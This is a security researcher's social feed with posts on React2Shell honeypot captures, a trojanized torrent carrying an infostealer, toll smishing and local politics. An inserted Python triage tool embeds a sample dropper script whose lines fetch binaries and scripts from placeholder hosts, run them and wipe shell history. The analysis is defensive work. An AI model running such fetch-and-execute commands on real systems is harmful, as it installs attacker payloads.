Andrew 🌻 Brandt 🐇


Words published here do not necessarily reflect views of my employer or any other organization I am affiliated with.

Research and analysis about malware, network forensics, and the intersection of crime with anything that electrons or photons flow through.

Board member of World Cyber Health, the parent organization behind Malware Village and the NO-HAVOC project.

Docent of obsolete technology at @mediaarchaeologylab

Executive director, Elect More Hackers: electmorehackers.com

"By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges." -- Cory Doctorow

Backup tooter: @threatresearch.bsky.social
Threat level: mostly harmless

Apparently it doesn't matter whether you have long-term Windows updates through October with extended updates, if you use Windows 10, #Slack is going to just cut off your ability to use the dedicated app on May 18.

Have to say, this sucks, but I guess they will let you use the browser -- for now.

It has been a busy winter so far for me, which is why I haven't been posting a lot here. But today I'm proud to share with you the fruits of some of that labor: The Colorado Democratic Party's platform for 2026. For those unfamiliar, a platform (in the US) is a statement of values that a political party stands for, generally agreed upon by people who stand for election as representatives of the party.

I was elected during last year's party re-org to the Platform Committee. The chair of the committee asked if I would run the subcommittees for two of the "planks" (sections) of the platform: the Democracy section, and the New Tech & AI section. It was an honor to work on both.

I'm going to share screenshots from the New Tech & AI plank because it's relevant to the work I do here, and I think a lot of people might be interested to see this statement of values. This plank is brand new, never before covered in prior Platform documents.

I'm also pleased to report that the whole of the Platform Committee and the roughly 1500 delegates to last weekend's statewide party Assembly voted to approve this as-is, with no additional changes, on a vote of 98.9% in favor.

There's a lot to like, but my favorite aspect of this is that I managed to get widespread approval for use of the term #enshittification in the official platform, both from the Platform committee and the larger party leadership. Thanks @pluralistic for the inspiration. (I believe this is the first time the term has been used in any official political party platform ever.)

The full platform is readable at https://www.coloradodems.org/platform

#AI #datasovereignty #privacy #infosec #techequity #R2R #RightToRepair #politics #COpolitics #Boulder #Colorado #Democracy #democrats

Watching the premiere episode of @huntress' new webcast, _declassified, and John Hammond is talking to master scam-baiter Jim Browning about a hidden-camera video he's showing of a job interview of a prospective scam call center worker. The interviewer and interviewee use a kind of coded language to talk about the interviewee's experience in phone-based scams. Truly remarkable insider video I've never seen before. #scam #spam #cybercrime

I had a chance last week to chat with Benjamin Read of #Wiz. Last month, Read and other members of his team published a deep dive into the #React2Shell (CVE-2025-55182) vulnerability, and I was curious to see what has been hitting my honeypot, so I took a closer look.

This is doing some weird stuff, friends.

As is normally the case with exploits targeting internet-facing devices, once the exploit becomes known, it ends up in the automated scanners used by threat actors and security researchers. What I've seen over the past week is a combination of both.

In just a few hours of operation, I identified a small number of source IP addresses exploiting React2Shell by pointing the vulnerable system at URLs hosting Bash scripts. These scripts are really familiar to anyone who routinely looks at honeypot data - they contain a series of commands that pull down and execute malicious payloads.

And as I've seen in the past, some of these payloads use racially inflammatory language in their malware. It's weird and gross, but unfortunately, really common.

But while most of these payloads were "the usual suspects" - remote shells, cryptocurrency miners - there was one payload that stuck out.

It's an exploit file, based on this proof-of-concept [https://github.com/iotwar/FIVEM-POC/blob/main/fivem-poc.py] designed to DDoS a modded server running "FiveM," a popular version of the game Grand Theft Auto V.

Let that one sink in: among the earliest adopters of a brand new exploit are...people trying to mess with other people's online game servers.

I've long said that exploits like these are the canaries in the datacenter coal mine. After all, if an attacker can force your server to run a cryptominer (or a game DDoS tool), they can force it to run far more malicious code.

I guess someone, or a group of someones, just want to ruin everyone's good time, no matter how or what form that takes. And they'll do it in the most offensive way possible.

Anyway, patch your servers, please, if only to stick it to these people who want to be the reason we can't have nice things.

#PoC #exploit #CVE_2025_55182 #DDoS #FiveM #REACT #Bash #cryptominer #malware
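The post above describes the dropper scripts that React2Shell exploitation pointed the honeypot at: a series of commands that fetch payloads, mark them executable, run them and clean up. The triage helper below is an added example, not code from the post's author or from Wiz; it pulls the indicators a honeypot operator wants out of such a script (download URLs and hosts, dropped file names, what gets executed, pipe-to-shell and anti-forensics lines). The sample script it runs on is constructed for illustration, and the addresses and paths in it are placeholders, not observed indicators.

```python
"""Triage a fetch-and-execute dropper script of the kind seen on honeypots.

Added example (not the author's code). SAMPLE_DROPPER is a constructed
script modelled on the generic "cd /tmp; wget; chmod; run; rm" pattern;
198.51.100.23 and example.invalid are documentation placeholders.
"""
import re
import sys
from urllib.parse import urlparse

SAMPLE_DROPPER = r"""#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.51.100.23/bins/x86 -O .x86; chmod +x .x86; ./.x86 react; rm -rf .x86
curl -fsSL http://198.51.100.23/bins/arm7 -o .arm7 && chmod 777 .arm7 && ./.arm7 react
curl -s http://example.invalid/miner.sh | bash
history -c
"""

URL_RE = re.compile(r"https?://[^\s'\"|;&)]+")
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
OUTFILE_RE = re.compile(r"\s-[oO]\s+([^\s;&|]+)")          # wget -O / curl -o target
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+([^\s;&|]+)")
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./([^\s;&|]+)")      # ./dropped_binary
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba|z|da)?sh\b")    # curl ... | bash
CLEANUP_RE = re.compile(r"\b(rm\s+-rf?\s+\S+|history\s+-c|unset\s+HISTFILE)")


def _add_unique(seq: list, item: str) -> None:
    if item not in seq:
        seq.append(item)


def triage_dropper(script: str) -> dict:
    """Extract indicators and behaviours from a shell dropper. Pure string analysis;
    nothing in the script is executed."""
    urls, dropped, executed, cleanup = [], [], [], []
    pipe_to_shell = False
    for line in script.splitlines():
        for url in URL_RE.findall(line):
            _add_unique(urls, url)
        if FETCH_RE.search(line):
            for name in OUTFILE_RE.findall(line):
                _add_unique(dropped, name)
        for name in CHMOD_RE.findall(line):
            _add_unique(dropped, name)
        for name in EXEC_RE.findall(line):
            _add_unique(executed, name)
        if PIPE_TO_SHELL_RE.search(line):
            pipe_to_shell = True
        for frag in CLEANUP_RE.findall(line):
            _add_unique(cleanup, frag)
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    return {
        "urls": urls,
        "hosts": hosts,              # candidates for blocklists / pDNS pivots
        "dropped_files": dropped,    # names to hunt for on disk
        "executed": executed,        # binaries the script actually launched
        "pipe_to_shell": pipe_to_shell,
        "cleanup": cleanup,          # anti-forensics: self-delete, history wipe
    }


def is_dropper(script: str) -> bool:
    """A script that fetches from the network and then runs what it fetched
    (either a dropped binary or a piped second-stage script) is a dropper."""
    t = triage_dropper(script)
    return bool(t["urls"]) and (bool(t["executed"]) or t["pipe_to_shell"])


if __name__ == "__main__":
    # Usage: python triage.py captured_script.sh   (defaults to the constructed sample)
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_DROPPER
    for key, value in triage_dropper(text).items():
        print(f"{key:14} {value}")
    print("verdict:       ", "dropper" if is_dropper(text) else "not a dropper")
```

The point of keeping this as string analysis is that a honeypot operator can run it over every fetched script in bulk without ever executing them; the hosts list feeds blocklists and passive-DNS pivots, and the dropped-file and executed names are what you would sweep a compromised React host for. Patterns in the wild vary (base64-wrapped commands, busybox wget, python one-liners), so treat the regexes as a starting point to extend, not a complete signature set.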

Here's that one life hack that Big Industrial Mince Pie doesn't want you to know: These are super easy to make at home. Gluten free and homemade filling, baked at mountain altitude.

Big windstorm in #Boulder today. Lost power about an hour ago. Good reminder that we already have candles ready to go. Happy Hanukkah, all.

#COWx

A remarkable outcome for a large group of local Colorado activists last night. In Longmont, a Denver suburb northeast of Boulder, more than 50 people testified last night to city council (and more than 90 people came to the council meeting) about their pending renewal of a contract with Flock, the ALPR company that has been under fire for its surveillance capitalism. DeFlock Longmont, the group that organized the public comment scrum, won a victory when city council voted not to renew the contract at the end of the hours-long meeting.

Public comment was at times serious and other times silly, but unanimous in opposition to the city renewing their contract. Public safety officials, including the chief of Longmont Police, testified after the public comment period that the Flock cameras had been instrumental in stopping a number of dangerous incidents and arresting people who committed violent crimes.

I hope you're following this, @404mediaco because we are not going to stop with just this one city.

Read the story here:

https://yellowscene.com/2025/12/10/longmont-residents-win-fight-against-ai-surveillance/

edit: added BRL story:

https://boulderreportinglab.org/2025/12/11/longmont-halts-flock-license-plate-reader-data-sharing-and-weighs-ending-contract-as-boulder-plans-to-renew/

Watch the video:

https://www.youtube.com/watch?v=CFj3UlteWHE

#COpolitics #Colorado #Longmont #Flock #ALPR #resistance

At the city council meeting for #Longmont, Colorado, more than 90 people have come to do public comment in opposition to the city renewing its contract with #Flock, the #ALPR company whose products have been under fire as a result of the abuse of the company's products by ICE, CBP, and other federal law enforcement agencies. It is a massive turnout for any city council meeting. The meeting is being livestreamed on the Longmont youtube live stream. This is going to be a very passionate public comment period at this meeting.

Oldies are still goodies: It didn't take me long to find a #trojanized pirated TV show #Torrent on a public torrent search engine.

Tell your friends: This is why it's sometimes dangerous to pirate stuff.

The torrent delivers a rar that contains a #Rhadamanthys #infostealer #malware DLL. The package also contains a benign executable that uses the familiar VLC Player traffic-cone icon. It looks like a TV show file, but it's way too small at only 970 KB. Double-clicking the benign executable loads the malware DLL.

Rhadamanthys is the same malware family that Europol put out a press release about last month. Maybe it was down for a while, but it seems it's not out -- yet.

The bogus torrent leverages strong interest in the streaming TV show Pluribus as its lure.

https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down

https://www.virustotal.com/gui/file/a11f4f6270b44992837a3f3869397c00fc19176c673abd15edbda39e45227fd5/details

Links to a fresh set of "road toll" scam websites were pushed out by SMS today, targeting people with mobile phones in #Colorado area codes. The messages tell the recipient that they owe back tolls for driving on a highway in Colorado and purports to link to the Colorado DMV website. The page that loads accurately mimics the Colorado Department of Revenue website appearance, and claims you owe $6.69 in tolls. Needless to say, this is fake. Spread the word: Tolls are not collected directly via SMS message.

This is a continuation of an ongoing, Russia-originated campaign that has been targeting specific states and regions for the past year. I blogged about it in October for @Netcraft - we gave the threat actor the moniker Logger EIO. https://www.netcraft.com/blog/taxpayers-drivers-targeted-in-refund-and-road-toll-smishing-scams

#smishing #phishing #colorado #CODOR #CODMV #DMV #scam #fraud #roadtoll #tollroad #tollscam #LoggerEIO